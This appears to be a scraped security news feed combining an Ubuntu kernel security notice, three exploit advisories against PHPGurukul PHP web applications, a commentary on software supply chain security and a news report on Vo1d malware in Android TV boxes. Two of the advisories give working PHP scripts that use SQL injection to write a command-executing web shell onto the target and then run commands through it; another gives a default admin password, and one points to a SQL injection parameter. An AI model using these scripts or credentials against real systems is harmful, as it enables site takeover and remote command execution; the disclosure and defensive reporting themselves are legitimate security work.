a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6999-1  CVE-2022-48772, CVE-2023-52884, CVE-2024-23848, CVE-2024-31076,  CVE-2024-32936, CVE-2024-33619, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34030, CVE-2024-34777, CVE-2024-35247,  CVE-2024-36015, CVE-2024-36244, CVE-2024-36270, CVE-2024-36281,  CVE-2024-36286, CVE-2024-36288, CVE-2024-36477, CVE-2024-36478,  CVE-2024-36479, CVE-2024-36481, CVE-2024-36484, CVE-2024-36489,  CVE-2024-36971, CVE-2024-36972, CVE-2024-36973, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37021, CVE-2024-37026, CVE-2024-37078,  CVE-2024-37354, CVE-2024-37356, CVE-2024-38306, CVE-2024-38381,  CVE-2024-38384, CVE-2024-38385, CVE-2024-38388, CVE-2024-38390,  CVE-2024-38618, CVE-2024-38619, CVE-2024-38621, CVE-2024-38622,  CVE-2024-38623, CVE-2024-38624, CVE-2024-38625, CVE-2024-38627,  CVE-2024-38628, CVE-2024-38629, CVE-2024-38630, CVE-2024-38632,  CVE-2024-38633, CVE-2024-38634, CVE-2024-38635, CVE-2024-38636,  CVE-2024-38637, CVE-2024-38659, CVE-2024-38661, CVE-2024-38662,  CVE-2024-38663, CVE-2024-38664, CVE-2024-38667, CVE-2024-38780,  CVE-2024-39276, CVE-2024-39277, CVE-2024-39291, CVE-2024-39296,  CVE-2024-39298, CVE-2024-39301, CVE-2024-39371, CVE-2024-39461,  CVE-2024-39462, CVE-2024-39463, CVE-2024-39464, CVE-2024-39465,  CVE-2024-39466, CVE-2024-39467, CVE-2024-39468, CVE-2024-39469,  CVE-2024-39470, CVE-2024-39471, CVE-2024-39473, CVE-2024-39474,  CVE-2024-39475, CVE-2024-39478, CVE-2024-39479, CVE-2024-39480,  CVE-2024-39481, CVE-2024-39483, CVE-2024-39485, CVE-2024-39488,  CVE-2024-39489, CVE-2024-39490, CVE-2024-39491, CVE-2024-39492,  CVE-2024-39493, CVE-2024-39494, CVE-2024-39495, CVE-2024-39496,  CVE-2024-39497, CVE-2024-39498, CVE-2024-39499, CVE-2024-39500,  CVE-2024-39501, CVE-2024-39502, CVE-2024-39503, CVE-2024-39504,  CVE-2024-39505, CVE-2024-39506, CVE-2024-39507, CVE-2024-39508,  CVE-2024-39509, CVE-2024-39510, CVE-2024-40899, CVE-2024-40900,  CVE-2024-40901, CVE-2024-40902, CVE-2024-40903, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40906, CVE-2024-40908, CVE-2024-40909,  CVE-2024-40910, CVE-2024-40911, CVE-2024-40912, CVE-2024-40913,  CVE-2024-40914, CVE-2024-40915, CVE-2024-40916, CVE-2024-40917,  CVE-2024-40918, CVE-2024-40919, CVE-2024-40920, CVE-2024-40921,  CVE-2024-40922, CVE-2024-40923, CVE-2024-40924, CVE-2024-40925,  CVE-2024-40926, CVE-2024-40927, CVE-2024-40928, CVE-2024-40929,  CVE-2024-40930, CVE-2024-40931, CVE-2024-40932, CVE-2024-40933,  CVE-2024-40934, CVE-2024-40935, CVE-2024-40936, CVE-2024-40937,  CVE-2024-40938, CVE-2024-40939, CVE-2024-40940, CVE-2024-40941,  CVE-2024-40942, CVE-2024-40943, CVE-2024-40944, CVE-2024-40945,  CVE-2024-40947, CVE-2024-40948, CVE-2024-40949, CVE-2024-40951,  CVE-2024-40952, CVE-2024-40953, CVE-2024-40954, CVE-2024-40955,  CVE-2024-40956, CVE-2024-40957, CVE-2024-40958, CVE-2024-40959,  CVE-2024-40960, CVE-2024-40961, CVE-2024-40962, CVE-2024-40963,  CVE-2024-40964, CVE-2024-40965, CVE-2024-40966, CVE-2024-40967,  CVE-2024-40968, CVE-2024-40969, CVE-2024-40970, CVE-2024-40971,  CVE-2024-40972, CVE-2024-40973, CVE-2024-40974, CVE-2024-40975,  CVE-2024-40976, CVE-2024-40977, CVE-2024-40978, CVE-2024-40979,  CVE-2024-40980, CVE-2024-40981, CVE-2024-40982, CVE-2024-40983,  CVE-2024-40984, CVE-2024-40985, CVE-2024-40986, CVE-2024-40987,  CVE-2024-40988, CVE-2024-40989, CVE-2024-40990, CVE-2024-40992,  CVE-2024-40994, CVE-2024-40995, CVE-2024-40996, CVE-2024-40997,  CVE-2024-40998, CVE-2024-40999, CVE-2024-41000, CVE-2024-41001,  CVE-2024-41002, CVE-2024-41003, CVE-2024-41004, CVE-2024-41005,  CVE-2024-41006, CVE-2024-41040, CVE-2024-42078, CVE-2024-42148Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-44.44  https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1015.16  https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1014.16  https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1010.13  https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1012.12  https://launchpad.net/ubuntu/+source/linux-lowlatency/6.8.0-44.44.1  https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1012.12  https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1012.12

Ubuntu Security Notice USN-6999-1

Nipah Virus Testing Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/nipah-tms/';// مسار ثابت لرفع الملف$path = 'C:\www\nipah-tms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Nipah Virus Testing Management System 1.0 PHP Code Injection

Medical Card Generations System version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Medical Card Generations System 1.0 Sql injection Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : view-card-detail.php?viewid=1 <==== inject here [+] http://127.0.0.1/mcgs/view-card-detail.php?viewid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Medical Card Generations System 1.0 SQL Injection

Maid Hiring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Maid Hiring Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/maid-hiring-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/mhms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Maid Hiring Management System 1.0 Insecure Settings

Emergency Ambulance Hiring Portal version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/eahp/';// مسار ثابت لرفع الملف$path = 'C:\www\eahp\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Emergency Ambulance Hiring Portal 1.0 PHP Code Injection

Understanding a threat is just as important as the steps taken toward prevention.

Ansh Patnaik, Senior Vice President of Product Management, CyCognito

September 12, 2024

5 Min Read

Source: Zonnar GmbH via Alamy Stock Photo

COMMENTARY

In recent years, software supply chain attacks have moved from the periphery of concerns to the forefront. According to Verizon's "2024 Data Breach Investigations Report," the use of vulnerabilities to initiate breaches surged by 180% in 2023, compared to 2022. Of those breaches, 15% involved a third party or supplier, such as software supply chains, hosting partner infrastructures, or data custodians. 

These statistics come as no surprise, given the impact of several high-profile vulnerabilities in 2023. 

SolarWinds is probably the biggest known example of a software supply chain attack to date. More than 18,000 organizations were affected, with some reports stating the attack cost those affected 11% of their revenue, on average.

Similarly, Okta also experienced a significant breach where threat actors accessed private customer data through its support management system. The breach went undetected for weeks, despite security alerts.

And let's not forget the drawn-out MOVEit Transfer tool attack, which affected more than 620 organizations, including major entities like the BBC and British Airways. Linked to the Cl0p ransomware group, the attack clearly emphasized the urgency of promptly patching vulnerabilities and securing Web-facing applications. 

A very important detail to note is that the ramifications of software supply chain attacks could be enduring, both from a technical threat and liability perspective. In October 2023, nearly three years after the notorious SolarWinds breach, the Securities and Exchange Commission (SEC) charged SolarWinds with misleading investors about its cybersecurity practices and risks. This charge followed a $26 million settlement of a securities class-action lawsuit related to the breach.

But to understand how these attacks occur and how they can be mitigated, it's important to first understand what software supply chain security is.

**Unpacking Software Supply Chain Security**

Gartner defines software supply chain security (SSCS) as a comprehensive framework encompassing the processes and tools necessary to curate, create, and consume software securely, thereby mitigating potential attacks on software or its use as an attack vector. This framework is structured around three core pillars:

1.  Curation: This step is all about evaluating third-party software components to assess their risks and determine if they're suitable for use. By doing this, organizations ensure that only secure and compliant components make their way into the software supply chain.
    
2.  Creation: This shows the importance of secure development practices and protecting both software artifacts and the development pipeline. It involves putting security measures in place throughout the software creation process to guard against vulnerabilities and potential threats.
    
3.  Consumption: This stage focuses on ensuring the integrity of the software by verifying its source, authenticity, and traceability. It ensures that the software being deployed is secure and has not been tampered with or modified without authorization.
    

In simpler terms, SSCS encompasses all the software components used and built into an organization's software, as well as the practices developers employ to write and monitor code post-deployment.

Gartner's efforts in this area are a direct result of what it deems to be an escalating threat. In fact, it projects that the financial impact of supply chain attacks will escalate from $40 billion in 2023 to $138 billion by 2031.

The US government is also taking measures, mandating that its suppliers provide a software bill of materials (SBOM), underscoring the need for transparency and accountability in the software supply chain.

**Building a Software Supply Chain Security Program**

Managing the risk of vulnerabilities during software development relies on two main processes: continuous code scanning throughout the software development life cycle (SDLC) and maintaining a highly automated SDLC to efficiently update, test, and deploy new software versions.

*   Continuous code scanning: It's crucial to implement continuous code scanning throughout the SDLC to catch vulnerabilities early. This involves using both static and dynamic application security testing (SAST and DAST) to ensure that both proprietary and third-party code are secure.
    
*   Automated SDLC: Keeping the SDLC highly automated is key to efficiently updating, testing, and deploying new software versions. Automation helps reduce human error and speeds up the process of identifying and fixing vulnerabilities.
    

Scanning third-party code with source code analysis (SCA) tools is essential in this context. SCA automates the detection and management of risks associated with third-party and open source software components. Here's what SCA can do:

*   Identify software components: SCA tools can pinpoint all the components within a software application, giving you a clear view of the software supply chain.
    
*   Generate software bills of materials (SBOM): SBOMs provide a list of all components and their metadata, helping organizations comply with regulatory requirements and manage open source licenses.
    
*   Scan for vulnerabilities: These tools scan for known vulnerabilities in software components, offering alerts and guidance for remediation.
    
*   Assess risks: They evaluate the risk level of each component, allowing organizations to prioritize remediation efforts based on the severity of the risk.
    
*   Generate dependency graphs: These graphs show the relationships between components, helping to identify potential points of failure or risk.
    
*   Provide remediation guidance: SCA tools offer actionable advice on how to fix identified vulnerabilities.
    
*   Automatically enforce policies: You can set policies to automatically block the use of components with known vulnerabilities or license issues.
    

External exposure management is also playing an increasingly critical role in supply chain security, with organizations adding more third-party services and building more Web apps using third-party components and libraries every day.

**The Future**

The financial impact of these attacks is projected to grow significantly, making it imperative for organizations to act now. 

The key moving forward is first awareness. Understanding the threat is as important as the steps toward prevention. Once this is established, there are ample resources and technologies to equip security teams with the reinforcements to protect their ecosystems.

**About the Author**

Senior Vice President of Product Management, CyCognito

Ansh Patnaik, senior vice president of product management of CyCognito, has more than 20 years of cross functional experience in cybersecurity and data analytics. Most recently, Ansh was director, cloud security products for Google Cloud Platform, and chief product officer for Chronicle, prior to the acquisition of Chronicle by Google. Previously, he was vice president of product management at Oracle Cloud, where he defined and launched its security analytics cloud service offering. Ansh has held product management, product marketing, and sales engineering leadership roles at several market leading software companies, including Delphix, ArcSight (acquired by HP), and BindView (acquired by Symantec).

Rising Tide of Software Supply Chain Attacks: An Urgent Problem

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).
"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).

"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus vendor Doctor Web said in a report published today.

A majority of the infections have been detected in Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia.

It's currently not known what the source of the infection is, although it's suspected that it may have either involved an instance of prior compromise that allows for gaining root privileges or the use of unofficial firmware versions with built-in root access.

The following TV models have been targeted as part of the campaign -

*   KJ-SMART4KVIP (Android 10.1; KJ-SMART4KVIP Build/NHG47K)
*   R4 (Android 7.1.2; R4 Build/NHG47K)
*   TV BOX (Android 12.1; TV BOX Build/NHG47K)

The attack entails the substitution of the "/system/bin/debuggerd" daemon file (with the original file moved to a backup file named "debuggerd\_real"), as well as the introduction of two new files – "/system/xbin/vo1d" and "/system/xbin/wd" – which contain the malicious code and operate concurrently.

"Before Android 8.0, crashes were handled by the debuggerd and debuggerd64 daemons," Google notes in its Android documentation. "In Android 8.0 and higher, crash\_dump32 and crash\_dump64 are spawned as needed."

Two different files shipped as part of the Android operating system – install-recovery.sh and daemonsu – have been modified as part of the campaign to trigger the execution of the malware by starting the "wd" module.

"The trojan's authors probably tried to disguise one if its components as the system program '/system/bin/vold,' having called it by the similar-looking name 'vo1d' (substituting the lowercase letter 'l' with the number '1')," Doctor Web said.

The "vo1d" payload, in turn, starts "wd" and ensures it's persistently running, while also downloading and running executables when instructed by a command-and-control (C2) server. Furthermore, it keeps tabs on specified directories and installs the APK files that it finds in them.

"Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google